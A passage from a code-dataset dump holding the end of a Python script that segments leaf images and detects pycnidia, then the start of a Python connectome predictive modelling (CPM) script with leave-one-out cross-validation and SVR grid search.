BACKGROUND to white\nmask1 = cv2.bitwise_not(mask1)\n\n#There are still spots not belonging to the leaf\n#remove small objects to get rid of them\n\n#find all connected components\nnb_components, output, stats, centroids = cv2.connectedComponentsWithStats(mask1, connectivity=8)\n#connectedComponentswithStats yields every seperated component with information on each of them, such as size\n#take out the background which is also considered a component\nsizes = stats[1:, -1]; nb_components = nb_components - 1\n\n#minimal size of particle\n#somwhere between largest unreal feature and leaf size\nmin_size = 500000\n\n#cleaned mask\nmask_cleaned = np.zeros((output.shape))\n#for every component in the image,\n#keep only those above min_size\nfor i in range(0, nb_components):\n if sizes[i] >= min_size:\n mask_cleaned[output == i + 1] = 255\n\n#apply cleaned mask to the image\n[indx, indy] = np.where(mask_cleaned == 0)\nColor_Masked = img.copy()\nColor_Masked[indx, indy] = 255\n\n#plot\nfig, ax = plt.subplots(1,1, figsize=(10, 10))\nax.imshow(Color_Masked)\nax.set_title(\"MASKED\")\nplt.tight_layout()\nplt.show()\n\n########################################################################################################################\n# De-correlation stretching\n########################################################################################################################\n\n#code source: https://github.com/lbrabec/decorrstretch\ndef decorrstretch(A, tol=None):\n \"\"\"\n Apply decorrelation stretch to image\n Arguments:\n A -- image in cv2/numpy.array format\n tol -- upper and lower limit of contrast stretching\n \"\"\"\n\n # save the original shape\n orig_shape = A.shape\n # reshape the image\n # B G R\n # pixel 1 .\n # pixel 2 .\n # . . . .\n A = A.reshape((-1,3)).astype(np.float)\n # covariance matrix of A\n cov = np.cov(A.T)\n # source and target sigma\n sigma = np.diag(np.sqrt(cov.diagonal()))\n # eigen decomposition of covariance matrix\n eigval, V = np.linalg.eig(cov)\n # stretch matrix\n S = np.diag(1/np.sqrt(eigval))\n # compute mean of each color\n mean = np.mean(A, axis=0)\n # substract the mean from image\n A -= mean\n # compute the transformation matrix\n T = reduce(np.dot, [sigma, V, S, V.T])\n # compute offset\n offset = mean - np.dot(mean, T)\n # transform the image\n A = np.dot(A, T)\n # add the mean and offset\n A += mean + offset\n # restore original shape\n B = A.reshape(orig_shape)\n # for each color...\n for b in range(3):\n # apply contrast stretching if requested\n if tol:\n # find lower and upper limit for contrast stretching\n low, high = np.percentile(B[:,:,b], 100*tol), np.percentile(B[:,:,b], 100-100*tol)\n B[Bhigh] = high\n # ...rescale the color values to 0..255\n B[:,:,b] = 255 * (B[:,:,b] - B[:,:,b].min())/(B[:,:,b].max() - B[:,:,b].min())\n # return it as uint8 (byte) image\n return B.astype(np.uint8)\n\nmask_ds = decorrstretch(Color_Masked)\n\n#plot\nfig, ax = plt.subplots(1,2, figsize=(10, 10), sharex=True, sharey=True)\nax[0].imshow(mask_ds)\nax[0].set_title(\"dcs\")\nax[1].imshow(Color_Masked)\nax[1].set_title(\"original\")\nplt.tight_layout()\nplt.show()\n\n########################################################################################################################\n# Transform to grayscale image\n########################################################################################################################\n\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\n\nimg_gs = rgb2gray(Color_Masked)\n\nfig, ax = plt.subplots(1,1, figsize=(10, 10))\nax.imshow(img_gs, cmap = \"gray\")\nax.set_title(\"gray\")\nplt.tight_layout()\nplt.show()\n\n#invert grayscale image\nimg_gs_inv = util.invert(img_gs)\nimg_gs_inv = np.around(img_gs_inv, decimals=0)\n\nfig, ax = plt.subplots()\nax.plot()\nax.imshow(img_gs_inv, cmap = \"gray\")\nax.set_title('mask')\nplt.tight_layout()\nplt.show()\n\n########################################################################################################################\n# Detect Pycnidia\n########################################################################################################################\n\n# image_max is the dilation of im with a 20*20 structuring element\n# It is used within peak_local_max function\nimage_max = ndi.maximum_filter(img_gs_inv, size=3, mode='constant')\n\n# Comparison between image_max and im to find the coordinates of local maxima\ncoordinates = peak_local_max(img_gs_inv, min_distance=3, threshold_abs=-250)\n# display result\nfig, axes = plt.subplots(1, 2, figsize=(8, 3), sharex=True, sharey=True)\nax = axes.ravel()\nax[0].imshow(Color_Masked, cmap=\"gray\")\nax[0].axis('off')\nax[0].set_title('Original')\n\nax[1].imshow(img_gs_inv, cmap=\"gray\")\nax[1].autoscale(False)\nax[1].plot(coordinates[:, 1], coordinates[:, 0], 'r.')\nax[1].axis('off')\nax[1].set_title('Peak local max')\n\nfig.tight_layout()\n\nplt.show()\n\n###########################################\n\n#prepare image for h_maxima and local_maxima functions\nimg = color.rgb2gray(Color_Masked)\nimg = 255-img\nimg = exposure.rescale_intensity(img)\n\n#extract local maxima\nlocal_maxima = extrema.local_maxima(img_gs_inv)\nlabel_maxima = label(local_maxima)\noverlay = color.label2rgb(label_maxima, img_gs_inv, alpha=0.7, bg_label=0,\n bg_color=None, colors=[(1, 0, 0)])\n\n#local maxima with certrain contrast\nh = 0.05\nding = morphology.selem.disk(radius=3)\nh_maxima = extrema.h_maxima(img, h, selem=ding)\nlabel_h_maxima = label(h_maxima)\noverlay_h = color.label2rgb(label_h_maxima, img, alpha=0.7, bg_label=0,\n bg_color=None, colors=[(1, 0, 0)])\n\n# a new figure with 3 subplots\nfig, ax = plt.subplots(1, 3, figsize=(15, 5), sharex=True, sharey=True)\n\nax[0].imshow(Color_Masked, cmap='gray', interpolation='none')\nax[0].set_title('Original image')\nax[0].axis('off')\n\nax[1].imshow(overlay, interpolation='none')\nax[1].set_title('Local Maxima')\nax[1].axis('off')\n\nax[2].imshow(overlay_h, interpolation='none')\nax[2].set_title('h maxima for h = %.2f' % h)\nax[2].axis('off')\nplt.show()\n\n########################################################################################################################\n# Segmentation into Super-Pixels\n########################################################################################################################\n\n#get leaf size in pixels\nleaf_size = np.sum(img_gs != 255)\n\n#adjust segments to leaf size\nnsegs = leaf_size/150\n\nsegments_slic_ok = slic(Color_Masked, n_segments=nsegs, compactness=10, sigma=1, max_size_factor=3)\nfig, ax = plt.subplots()\nax.plot()\nax.imshow(mark_boundaries(Color_Masked, segments_slic_ok))\nax.set_title('qs')\nfor a in ax.ravel():\n a.set_axis_off()\nplt.tight_layout()\nplt.show()\n\n\n\n\n###########################################\n\n\ncrop_img = Color_Masked[1250:1600, 200:3000]\n\nfig, ax = plt.subplots()\nax.plot()\nax.imshow(img)\nax.set_title('mask')\nplt.tight_layout()\nplt.show()\n\n\nsegments_slic_ok = slic(crop_img, n_segments=1000, compactness=10, sigma=1, max_size_factor=3)\nsegments_slic = slic(crop_img, n_segments=1000, compactness=10, sigma=0.75, max_size_factor=3)\n\n\nsegments_quick100 = quickshift(crop_img, kernel_size=5, max_dist=100, ratio=1)\nsegments_quick200 = quickshift(crop_img, kernel_size=5, max_dist=200, ratio=1)\nsegments_quick400 = quickshift(crop_img, kernel_size=5, max_dist=400, ratio=1)\nsegments_quick800 = quickshift(crop_img, kernel_size=5, max_dist=800, ratio=1)\nsegments_quick2 = quickshift(crop_img, kernel_size=8, max_dist=800, ratio=1)\n\ngradient = sobel(rgb2gray(crop_img))\nsegments_watershed = watershed(gradient, markers=250, compactness=0.001)\n\nsegments_fz = felzenszwalb(crop_img, scale=50, sigma=1, min_size=50)\n\nfig, ax = plt.subplots()\nax.plot()\nax.imshow(mark_boundaries(crop_img, segments_fz))\nax.set_title('qs')\nfor a in ax.ravel():\n a.set_axis_off()\nplt.tight_layout()\nplt.show()\n\n###########################################\n\n\n\n\n\n\n\n\n","sub_path":"seg.py","file_name":"seg.py","file_ext":"py","file_size_in_byte":14710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"492049213","text":"\"\"\"\n# Connectome Predictive Modelling - Python adaptation - V2.0\n\nScript - CPM (LOOCV)\nAuthor: Frederic St-Onge (adapted from Shen et al. 2017)\n\nDate created: 2022-02-21\nDate modified: 2022-11-03\n\nVersion 2.0\n\nFuture versions:\n- Correlations in Matlab go much faster. We did some testing where we imported the original matlab function in Python. It works, but I am not sure if the gain in complexity is warranted for a little bit of time (really not that much time) gained.\n- Parallelization with numba?\n- Need to restore the other options from the original CPM (other types of feature selections, etc.)\n\n\"\"\"\n\n#CPM - Python translation\nimport os\nimport re\nfrom argparse import ArgumentParser\nimport warnings\n\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LinearRegression as lm\nfrom sklearn.svm import SVR\nfrom sklearn import metrics\nfrom sklearn import preprocessing\n\n\ndef main():\n \"\"\" Main function launching the CPM.\n \"\"\"\n print('---------------------------------------------')\n print('--Connectome Predictive Modelling in Python--')\n args = parsing()\n print('Parameters:')\n print(f' Path to connectivity matrices (modality 1): {args.path_arrays_mod1}')\n if args.path_arrays_mod2:\n print(f' Path to connectivity matrices (modality 2): {args.path_arrays_mod2}')\n print(f' File to use for behavior predictions: {args.data_to_pred_path}')\n print(' ')\n print(f' Type of model to train: {args.model}')\n print(f' Threshold level for feature selection: {args.thresh_corr}')\n print(f' Threshold level for shared edges in final mask: {args.thresh_retain}')\n print(f' Path to output: {args.output}')\n print(f' Name of the run: {args.name}')\n print(f' ')\n print('---------------------------------------------')\n print(' ')\n\n print('Importing the arrays for modality 1...')\n behav_data, dict_id_arrays1 = dictionary_importer(args.path_arrays_mod1, args.data_to_pred_path)\n if args.path_arrays_mod2:\n print('Importing the arrays for modality 2...')\n dict_id_arrays2 = dictionary_importer(args.path_arrays_mod2)\n else:\n dict_id_arrays2 = None\n\n print('Merging the connectivity matrices together...')\n matrix_3d = matrix_progenitor(dict_id_arrays_mod1=dict_id_arrays1,\n dict_id_arrays_mod2=dict_id_arrays2, behav_data=behav_data)\n\n print('Launching CPMPY...')\n behav_train, behav_pred_train, behav_test, dict_rmse, dict_behav_pred = cpmpy(\n behav_data=behav_data, matrix_3d=matrix_3d, args=args)\n\n print('Computing CPM performance...')\n predict_meas_valid = cpm_prediction_measures(behav_train=behav_train,\n behav_pred_train=behav_pred_train, behav_test=behav_test, \n dict_behav_pred=dict_behav_pred, args=args)\n\n print('Exporting CPM performance to file...')\n cpm_export(predict_meas_valid=predict_meas_valid, args=args)\n\ndef parsing():\n \"\"\" Take user arguments and return them.\n \"\"\"\n\n parser = ArgumentParser(description=\"\")\n\n parser.add_argument(\"-p1\", \"--path_arrays_mod1\", help=\"Path to the connectivity matrices to use.\")\n parser.add_argument(\"-p2\", \"--path_arrays_mod2\", default=None, help=\"Path to connectivity matrices to the second modality to use.\")\n parser.add_argument(\"-d\", \"--data_to_pred_path\", help=\"Behavior data to predict with the connectivity.\")\n parser.add_argument(\"-t\", \"--thresh_corr\", default=0.01, type=float, help='In the CPM, threshold at which a p-value is considered as positive (at the edge-level).')\n parser.add_argument(\"-r\", '--thresh_retain', default=0.95, type=float, help='Percentage of edges that should be retained in the final set.')\n parser.add_argument(\"-o\", \"--output\", help=\"Path where the output should be stored once run.\")\n parser.add_argument(\"-m\", \"--model\", choices=['LM', 'SVR'], help='Which prediction model to use? If SVR, a grid search is performed.')\n parser.add_argument(\"-n\", \"--name\", help=\"Suffix to add to the files to save.\")\n\n args = parser.parse_args()\n\n return args\n\ndef dictionary_importer(path_arrays, data_to_pred_path=None):\n \"\"\" Imports the arrays and the IDs to analyse using a dictionary.\n\n Needs to run as many times as I have modalities.\n \"\"\"\n\n #Import array names and ID data.\n folder_ls = os.listdir(path_arrays)\n behav_data = pd.read_csv(data_to_pred_path, index_col=0)\n\n #Empty dictionary to store the connectivity arrays\n dict_id_arrays = {}\n\n for file in folder_ls:\n #Extract ID from the files in the folder\n #TODO: Change below to an argument given by user for subject ID\n ids = re.search(r'[0-9]{6}', file).group()[0:6]\n\n #If the ID is in the target behavioral data, we import the corresponding array and store it\n if ids in behav_data.index.astype(str):\n array = np.loadtxt(f\"{path_arrays}/{file}\")\n\n dict_id_arrays[ids] = array\n\n if data_to_pred_path:\n return behav_data, dict_id_arrays\n else:\n return dict_id_arrays\n\ndef _3d_mat_baker(dicto):\n \"\"\" Hidden function. Takes a dictionary and turn the values in a 3d matrix.\n \"\"\"\n list_arrays = []\n for arrays in dicto.values():\n list_arrays.append(arrays)\n\n matrix_3d = np.dstack(list_arrays)\n\n return matrix_3d\n\ndef matrix_progenitor(dict_id_arrays_mod1, dict_id_arrays_mod2, behav_data):\n \"\"\" Function taking a dictionary of ids and arrays and returning a 3D array instead.\n\n When we have 2 modalities, we concatenate them on the first axis (stick the cubes side-by-side)\n \"\"\"\n\n matrix_3d_mod1 = _3d_mat_baker(dict_id_arrays_mod1)\n\n if dict_id_arrays_mod2:\n matrix_3d_mod2 = _3d_mat_baker(dict_id_arrays_mod2)\n matrix_3d = np.concatenate((matrix_3d_mod1, matrix_3d_mod2), axis=1)\n else:\n matrix_3d = matrix_3d_mod1.copy()\n\n #Run a couple user checks\n ### Check the number of matrices match the file inputed\n if matrix_3d.shape[2] == len(behav_data.index.values):\n print(f' Total of {matrix_3d.shape[2]} participants')\n else:\n raise RuntimeError(\" ERROR: The number of arrays doesn't match the desired\"\n \" number of participants\")\n\n ### If second modality given, then should be same size as first\n if dict_id_arrays_mod2:\n if matrix_3d.shape[1] != (2 * matrix_3d.shape[0]):\n raise RuntimeError(\" ERROR: The second modality\"\n \" should have the same number of nodes/columns as the first.\")\n ### If only one modality, then should be symmetrical\n else:\n if matrix_3d.shape[0] != matrix_3d.shape[1]:\n raise RuntimeError(\" ERROR: Currently, only \"\n \"symetric matrices are supported by cpmpy\")\n\n return matrix_3d\n\ndef _cpm_prep_sizes(matrix_3d):\n \"\"\" Simple function computing size of arrays for the CPM.\n \"\"\"\n\n nb_nodes_rows = matrix_3d.shape[0]\n nb_nodes_cols = matrix_3d.shape[1]\n\n return nb_nodes_rows, nb_nodes_cols\n\ndef _cpm_train_test_split(behav_data, matrix_3d):\n \"\"\" Wrapper function on top of sklearn's model selection.\n It just adds some data manipulation before and after to play\n around the 3d matrix.\n\n Returns the 2D split data\n \"\"\"\n\n #Turn the FP values to a single flat numpy array\n behav_array = np.squeeze(behav_data.to_numpy())\n\n #Turn the 3D matrix to a 2D array where rows are edges and columns are IDs.\n flat_fc_array = matrix_3d\\\n .reshape((matrix_3d.shape[0] * matrix_3d.shape[1]), matrix_3d.shape[2])\\\n .T #Flip so the IDs are rows (samples)\n\n #Train test split\n mat_train, mat_test, behav_train, behav_test = model_selection\\\n .train_test_split(flat_fc_array, behav_array, test_size=0.15, random_state=667)\n\n return mat_train, mat_test, behav_train, behav_test\n\ndef _cpm_edges_cube_reshape(mat, nb_nodes_rows, nb_nodes_cols):\n \"\"\" Short function reshaping the train and test matrices to cubes. Currently necessary to match\n the original matlab code, but can probably change later\n \"\"\"\n\n #We use a Fortran order because we shifted the orientation of the dataset\n # with a transpose earlier\n\n cube_mat = mat.reshape(nb_nodes_rows, nb_nodes_cols, mat.shape[0], order=\"F\")\n\n return cube_mat\n\ndef _cpm_prep_empty(nb_nodes_rows, nb_nodes_cols, mat_train, mat_test):\n \"\"\" From sizes computed, returns empty arrays we will use to store information.\n \"\"\"\n\n behav_pred_train = {}\n behav_pred_train[\"norm_pos\"] = np.zeros((mat_train.shape[0], 1))\n behav_pred_train[\"norm_neg\"] = np.zeros((mat_train.shape[0], 1))\n\n behav_pred_test = {}\n behav_pred_test[\"norm_pos\"] = np.zeros((mat_test.shape[0], 1))\n behav_pred_test[\"norm_neg\"] = np.zeros((mat_test.shape[0], 1))\n\n edges_cv_cube = {}\n edges_cv_cube['norm_pos'] = np.zeros((nb_nodes_rows, nb_nodes_cols, mat_train.shape[0]))\n edges_cv_cube['norm_neg'] = np.zeros((nb_nodes_rows, nb_nodes_cols, mat_train.shape[0]))\n\n rmse_train_final = {}\n rmse_train_final['norm_pos'] = pd.DataFrame(columns=['c_value',\n 'g_value', 'ep_value', 'rmse_pos', 'rmse_neg'])\n rmse_train_final['norm_neg'] = pd.DataFrame(columns=['c_value',\n 'g_value', 'ep_value', 'rmse_pos', 'rmse_neg'])\n\n return behav_pred_train, behav_pred_test, edges_cv_cube, rmse_train_final\n\ndef _cpm_loocv_sample(mat_train, behav_train, leftout):\n \"\"\" Function iteratively leaving out one participant and returning the sample to \n use for LOOCV\n \"\"\"\n\n mat_train_loocv = np.delete(mat_train, leftout, axis=0)\n behav_train_loocv = np.delete(behav_train, leftout, axis=0)\n\n return mat_train_loocv, behav_train_loocv\n\ndef _cpm_feature_selection(mat_train_loocv, behav_train_loocv, nb_nodes_rows, nb_nodes_cols):\n \"\"\" Core of the CPM. Each edge is assessed for it's correlation with the fingerprinting.\n \"\"\"\n\n r_val_arr = np.array([])\n p_val_arr = np.array([])\n\n s_behav_train_loocv = np.squeeze(behav_train_loocv)\n\n ########### Python-style correlation\n for col in range(mat_train_loocv.shape[1]):\n if (((col + 1) == 1) or ((col + 1) == mat_train_loocv.shape[1])):\n print(f' ...Starting correlations {col + 1}/{mat_train_loocv.shape[1]}')\n\n edge_values = np.squeeze(mat_train_loocv[:,col])\n\n with warnings.catch_warnings():\n warnings.filterwarnings('error') #If warning, consider as error\n try:\n r_val, p_val = scipy.stats.pearsonr(x=edge_values, y=s_behav_train_loocv)\n except Warning: #If warning, set correlation to null\n r_val = 0\n p_val = 1\n\n r_val_arr = np.append(r_val_arr, r_val)\n p_val_arr = np.append(p_val_arr, p_val)\n\n r_val_mat = np.reshape(r_val_arr, (nb_nodes_rows, nb_nodes_cols))\n p_val_mat = np.reshape(p_val_arr, (nb_nodes_rows, nb_nodes_cols))\n\n return r_val_mat, p_val_mat\n\ndef _cpm_significant_edges(r_val_mat, p_val_mat, thresh_corr):\n \"\"\" Based on the correlation and p-value, we determine which edge is significant.\n \"\"\"\n\n pos_mask = np.where(((r_val_mat > 0) & (p_val_mat < thresh_corr)), 1, 0)\n neg_mask = np.where(((r_val_mat < 0) & (p_val_mat < thresh_corr)), 1, 0)\n\n return pos_mask, neg_mask\n\ndef _cpm_sums(cube_mat, pos_mask, neg_mask, rand_pos_mask=None, rand_neg_mask=None):\n \"\"\" Function computing training sums from a cube.\n \"\"\"\n\n sum_edges = {}\n sum_edges['norm_pos'] = np.zeros((cube_mat.shape[2], 1))\n sum_edges['norm_neg'] = np.zeros((cube_mat.shape[2], 1))\n\n try:\n if rand_pos_mask.any():\n sum_edges['rand_pos'] = np.zeros((cube_mat.shape[2], 1))\n sum_edges['rand_neg'] = np.zeros((cube_mat.shape[2], 1))\n except AttributeError:\n pass\n\n for sub in range(0, sum_edges['norm_pos'].shape[0]):\n sum_edges['norm_pos'][sub] = sum(sum(cube_mat[:,:,sub] * pos_mask)) / 2\n sum_edges['norm_neg'][sub] = sum(sum(cube_mat[:,:,sub] * neg_mask)) / 2\n #Check if array for random is empty.\n #Will throw error if yes, so we simply pass if we get error.\n try:\n if rand_pos_mask.any(): #Check if the array is empty\n sum_edges['rand_pos'][sub] = sum(sum(cube_mat[:,:,sub] * rand_pos_mask)) / 2\n sum_edges['rand_neg'][sub] = sum(sum(cube_mat[:,:,sub] * rand_neg_mask)) / 2\n except AttributeError:\n pass\n\n return sum_edges\n\ndef _cpm_test_loocv_sums(cube_mat, pos_mask, neg_mask, leftout):\n \"\"\" Function to compute the test sum during the loocv\n \"\"\"\n\n test_mat = cube_mat[:,:,leftout]\n\n test_sum = {}\n test_sum[\"norm_pos\"] = np.array([sum(sum(test_mat * pos_mask)) / 2])\n test_sum[\"norm_neg\"] = np.array([sum(sum(test_mat * neg_mask)) / 2])\n\n return test_sum\n\ndef _svr_grid_search(train_sum_loocv, test_sum_loocv, behav_train_loocv, behav_test_loocv):\n \"\"\" Function performing a grid search on the SVR parameters. \n \"\"\"\n dict_rmse_loocv = {}\n\n param_data = pd.DataFrame(columns=['c_value', 'g_value',\n 'ep_value', 'rmse_pos', 'rmse_neg'])\n\n for c_value in [1,10,100,1000,10000,100000]:\n for g_value in [1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1]:\n for ep_value in [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1, 5, 10]:\n\n behav_train_loocv_scaled, behav_test_loocv_scaled = _svr_scaler(behav_train_loocv,\n behav_test_loocv)\n\n train_sum_loocv_scaled_pos, test_sum_loocv_scaled_pos = _svr_scaler(\n train_sum_loocv['pos'],\n test_sum_loocv['pos'])\n\n train_sum_loocv_scaled_neg, test_sum_loocv_scaled_neg = _svr_scaler(\n train_sum_loocv['neg'], test_sum_loocv['neg'])\n\n rmse_test_pos_loocv = _svr_fit_predict(train_sum_loocv_scaled_pos,\n test_sum_loocv_scaled_pos, behav_train_loocv_scaled,\n behav_test_loocv_scaled, g_value=g_value, c_value=c_value, ep_value=ep_value, type_pred='loocv')\n\n rmse_test_neg_loocv = _svr_fit_predict(train_sum_loocv_scaled_neg,\n test_sum_loocv_scaled_neg, behav_train_loocv_scaled,\n behav_test_loocv_scaled, g_value=g_value, c_value=c_value, ep_value=ep_value, type_pred='loocv')\n\n params_final = {'c_value':[c_value], 'g_value':[g_value], 'ep_value':[ep_value],\n 'rmse_pos':[rmse_test_pos_loocv], 'rmse_neg':[rmse_test_neg_loocv]}\n\n params_final_df = pd.DataFrame.from_dict(params_final, orient=\"columns\")\n\n param_data = pd.concat([param_data, params_final_df], axis=0, ignore_index=True)\n\n dict_rmse_loocv['norm_pos'] = param_data.loc[[param_data['rmse_pos'].idxmin()]]\n dict_rmse_loocv['norm_neg'] = param_data.loc[[param_data['rmse_neg'].idxmin()]]\n\n return dict_rmse_loocv\n\ndef _svr_scaler(train_sum, test_sum):\n \"\"\" Takes the imput to scale from train and test, scale them,\n seperate them, and return them.\n \"\"\"\n\n sum_scale = np.concatenate((np.squeeze(train_sum), test_sum))\n sum_scale_res = sum_scale.reshape(-1,1)\n scaler_sum = preprocessing.StandardScaler()\n scaled_sum = scaler_sum.fit(sum_scale_res)\\\n .transform(sum_scale_res)\n\n if test_sum.size == 1:\n train_sum_scaled = np.delete(scaled_sum, -1, axis=0)\n test_sum_scaled = scaled_sum[-1]\n else:\n train_sum_scaled = scaled_sum[0:train_sum.size]\n test_sum_scaled = scaled_sum[train_sum.size:]\n\n return train_sum_scaled, test_sum_scaled\n\ndef _svr_fit_predict(train_sum_scaled, test_sum_scaled, behav_train, behav_test,\n g_value, c_value, ep_value, type_pred):\n \"\"\" Fits and predicts and SVR model\n \"\"\"\n svr_obj = SVR(kernel='rbf', gamma=g_value, C=c_value, epsilon=ep_value)\n svr_obj.fit(train_sum_scaled, behav_train.ravel())\n if type_pred == \"final\":\n behav_pred_test = svr_obj.predict(test_sum_scaled)\n else:\n behav_pred_test = svr_obj.predict(test_sum_scaled.reshape(1,-1))\n\n rmse_test = metrics.mean_squared_error(np.squeeze([behav_test]), np.squeeze([behav_pred_test]), squared=False)\n\n #When doing the prediction, if we do LOOCV we only return the RMSE.\n # When doing the prediction on the final sample, we return the predicted values as well\n if type_pred == \"final\":\n return rmse_test, behav_pred_test\n return rmse_test\n\ndef _svr_best_param_selection(rmse_train_final, type_m):\n \"\"\" Simple function grabbing the best parameters from the SVR grid search (lowest RMSE)\n \"\"\"\n if type == \"pos\":\n min_rmse = rmse_train_final.loc[[rmse_train_final[f'rmse_{type_m}'].idxmin()]]\n else:\n min_rmse = rmse_train_final.loc[[rmse_train_final[f'rmse_{type_m}'].idxmin()]]\n\n c_value = min_rmse.loc[:,\"c_value\"].iloc[0]\n g_value = min_rmse.loc[:,\"g_value\"].iloc[0]\n ep_value = min_rmse.loc[:,\"ep_value\"].iloc[0]\n\n return c_value, g_value, ep_value\n\ndef _lm_fit_predict(train_sum, test_sum, behav_train, behav_test=None):\n \"\"\" Simple function fitting a predicting a linear model.\n When doing the final test prediction, we also want the RMSE.\n \"\"\"\n\n fit_lm = lm().fit(train_sum, behav_train)\n\n try:\n if behav_test.any():\n behav_pred_test = fit_lm.predict(test_sum)\n rmse_test = metrics.mean_squared_error(np.squeeze([behav_test]), np.squeeze([behav_pred_test]), squared=False)\n\n return rmse_test, behav_pred_test\n except AttributeError:\n behav_pred_test = fit_lm.predict(test_sum.reshape(1,-1))\n return behav_pred_test\n\ndef _cpm_cross_validated_edges(edges_cv_cube, thresh_retain):\n \"\"\" Computes the final mask to use in the final train/test set\n \"\"\"\n final_sum_edges = {}\n final_mask_edges = {}\n\n #Here, edges_cv_cube is a dictionary containing cubes of arrays, \n # 1 for positive and 1 for negative edges\n for key, arrays in edges_cv_cube.items(): #For positive and negative edges...\n final_edges_cv = np.sum(arrays, axis=2)\n mask = np.where(final_edges_cv >= (thresh_retain*arrays.shape[2]), 1, 0)\n\n final_sum_edges[key] = final_edges_cv\n final_mask_edges[key] = mask\n\n return final_sum_edges, final_mask_edges\n\ndef _cpm_random_mask(pos_neg_masks):\n \"\"\" Here, we want to create two random masks of random edges for prediction.\n We create 2 because the number of edges might differ between the positive\n and negative edges. We want a random mask that has the same number of edges as the mask\n they are trying to mimic.\n\n Easiest way is to simply shuffle the original array\n \"\"\"\n\n random_masks = {}\n\n for type_edges, mask in pos_neg_masks.items():\n flat_mask = mask.flatten() #Make the mask flat, because shuffle only works on 1 dimension\n np.random.seed(667) \n np.random.shuffle(flat_mask) #Shuffle position of 0 and 1s (in-place)\n rand_mask = flat_mask.reshape(mask.shape) #Reshape the shuffled array to the original shape\n\n random_masks[type_edges] = rand_mask \n\n return random_masks\n\ndef _cpm_export_edges(pos_neg_sums, args):\n \"\"\" Quick function exporting the matrices for the sum of participants\n using a given edge for predicted behavior.\n \"\"\"\n for keys, arrays in pos_neg_sums.items():\n np.savetxt(f'{args.output}/sum_{keys}_edges_cv_{args.name}.csv', arrays, delimiter=',', \n fmt='%f')\n\ndef cpmpy(behav_data, matrix_3d, args):\n \"\"\" Main CPM function. Under the hood it wraps multiple\n smaller functions that execute the different steps.\n \"\"\"\n #First, we prepare the CPM\n ## Get information on sizes of matrices\n print(\" Preparing CPM input...\")\n nb_nodes_rows, nb_nodes_cols = _cpm_prep_sizes(matrix_3d=matrix_3d)\n\n ## Train-Test split of the data\n mat_train, mat_test, behav_train, behav_test = _cpm_train_test_split(behav_data=behav_data,\n matrix_3d=matrix_3d)\n\n ## Creating of empty arrays to store stuff during computation\n behav_pred_train, behav_pred_test, edges_cv_cube, rmse_train_final = _cpm_prep_empty(\n nb_nodes_rows=nb_nodes_rows, nb_nodes_cols=nb_nodes_cols,\n mat_train=mat_train, mat_test=mat_test)\n\n #Final step: for some operations, need a cube of the matrices. Reshape it here.\n cube_mat_train = _cpm_edges_cube_reshape(mat=mat_train,\n nb_nodes_rows=nb_nodes_rows, nb_nodes_cols=nb_nodes_cols)\n\n cube_mat_test = _cpm_edges_cube_reshape(mat=mat_test,\n nb_nodes_rows=nb_nodes_rows, nb_nodes_cols=nb_nodes_cols)\n\n # Now, we can launch the CPM\n print(\" Launching cross-validation...\")\n for leftout in range(0, mat_train.shape[0]):\n #if ((leftout + 1) == 1) or ((leftout + 1) % 20 == 0):\n print(f' Leaving out participant {leftout + 1}/{mat_train.shape[0]}')\n\n mat_train_loocv, behav_train_loocv = _cpm_loocv_sample(mat_train=mat_train,\n behav_train=behav_train, leftout=leftout)\n\n r_val_mat, p_val_mat = _cpm_feature_selection(mat_train_loocv=mat_train_loocv,\n behav_train_loocv=behav_train_loocv, nb_nodes_rows=nb_nodes_rows,\n nb_nodes_cols=nb_nodes_cols)\n\n pos_mask, neg_mask =_cpm_significant_edges(r_val_mat=r_val_mat, p_val_mat=p_val_mat,\n thresh_corr=args.thresh_corr)\n\n edges_cv_cube[\"norm_pos\"][:,:,leftout] = pos_mask\n edges_cv_cube[\"norm_neg\"][:,:,leftout] = neg_mask\n\n #Might be a more elegant way of doing this, but I'm doing it this way\n #We basically need the matrices in a cube for easing some operations.\n\n cube_mat_loocv = np.delete(cube_mat_train, leftout, axis=2)\n\n train_sums_loocv = _cpm_sums(cube_mat_loocv, pos_mask=pos_mask, neg_mask=neg_mask)\n test_sums_loocv = _cpm_test_loocv_sums(cube_mat=cube_mat_train, pos_mask=pos_mask,\n neg_mask=neg_mask, leftout=leftout)\n\n behav_train_loocv = behav_train_loocv.copy()\n behav_test_loocv = np.array([behav_train[leftout]])\n\n if args.model == \"LM\":\n behav_pred_train['norm_pos'][leftout] = _lm_fit_predict(train_sums_loocv['norm_pos'],\n test_sums_loocv['norm_pos'], behav_train=behav_train_loocv)\n behav_pred_train['norm_neg'][leftout] = _lm_fit_predict(train_sums_loocv['norm_neg'],\n test_sums_loocv['norm_neg'], behav_train=behav_train_loocv)\n\n elif args.model == \"SVR\":\n svr_params, behav_pred_test[leftout] = _svr_grid_search(train_sums_loocv, test_sums_loocv, behav_train_loocv,\n behav_test_loocv)\n\n rmse_train_final['norm_pos'] = pd.concat([rmse_train_final['norm_pos'],\n svr_params['norm_pos']])\n rmse_train_final['norm_neg'] = pd.concat([rmse_train_final['norm_neg'],\n svr_params['norm_neg']])\n\n print(\" Final validation in test set\")\n #Final train/test measures for the final models\n final_sum_edges, final_mask_edges = _cpm_cross_validated_edges(\n edges_cv_cube=edges_cv_cube, thresh_retain=args.thresh_retain)\n\n #We write the final_sum_edges to file as we won't be needing it later and it's for future computations\n print(f' ... Exporting cross-validated edges to file...')\n _cpm_export_edges(final_sum_edges, args=args)\n\n #Create a random mask that will be used to generate random sums for prediction.\n rando_mask = _cpm_random_mask(pos_neg_masks=final_mask_edges)\n\n #Compute all training/test sums\n train_sum_final = _cpm_sums(cube_mat=cube_mat_train, pos_mask=final_mask_edges['norm_pos'],\n neg_mask=final_mask_edges['norm_neg'], \n rand_pos_mask=rando_mask['norm_pos'], rand_neg_mask=rando_mask['norm_neg'])\n\n test_sum_final = _cpm_sums(cube_mat=cube_mat_test, pos_mask=final_mask_edges['norm_pos'],\n neg_mask=final_mask_edges['norm_neg'], \n rand_pos_mask=rando_mask['norm_pos'], rand_neg_mask=rando_mask['norm_neg'])\n\n #Final phase: Prediction metrics in final 